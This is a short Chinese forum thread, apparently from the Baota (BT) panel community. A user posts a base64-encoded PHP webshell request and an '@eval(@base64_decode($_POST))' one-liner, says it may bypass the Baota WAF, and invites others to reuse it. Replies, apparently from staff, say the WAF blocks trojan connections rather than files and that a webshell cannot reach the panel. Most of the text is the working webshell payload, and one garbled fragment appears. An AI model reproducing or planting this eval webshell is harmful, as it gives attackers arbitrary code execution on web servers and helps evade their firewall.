【已解答】防火墙问题
v0a11740615496=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwgIjAiKTtAc2V0X3RpbWVfbGltaXQoMCk7ZnVuY3Rpb24gYXNlbmMoJG91dCl7cmV0dXJuICRvdXQ7fTtmdW5jdGlvbiBhc291dHB1dCgpeyRvdXRwdXQ9b2JfZ2V0X2NvbnRlbnRzKCk7b2JfZW5kX2NsZWFuKCk7ZWNobyAiMGVjYjQiO2VjaG8gQGFzZW5jKCRvdXRwdXQpO2VjaG8gIjQ3MDk2NTY4YjdhIjt9b2Jfc3RhcnQoKTt0cnl7ZWNobyAiN2xlOG5qOHE1NTVuenIxanp2ZzgiOzt9Y2F0Y2goRXhjZXB0aW9uICRlKXtlY2hvICJFUlJPUjovLyIuJGUtPmdldE1lc3NhZ2UoKTt9O2Fzb3V0cHV0KCk7ZGllKCk7&shadow=@eval(@base64_decode($_POST));今天实战,发现的疑似可以过宝塔waf的php一句话,你们借鉴一下看看,base64解码后看
证据............. F4랸? 您好,宝塔WAF只对木马连接进行拦截。不会对你服务器内的文件进行拦截。 谢花郎 发表于 2021-8-18 10:29
您好,宝塔WAF只对木马连接进行拦截。不会对你服务器内的文件进行拦截。
不是拦截,这样子不是可以随便进别人宝塔吗,绕过任何安全验证 这个只是webshell。进不去面板的
页:
[1]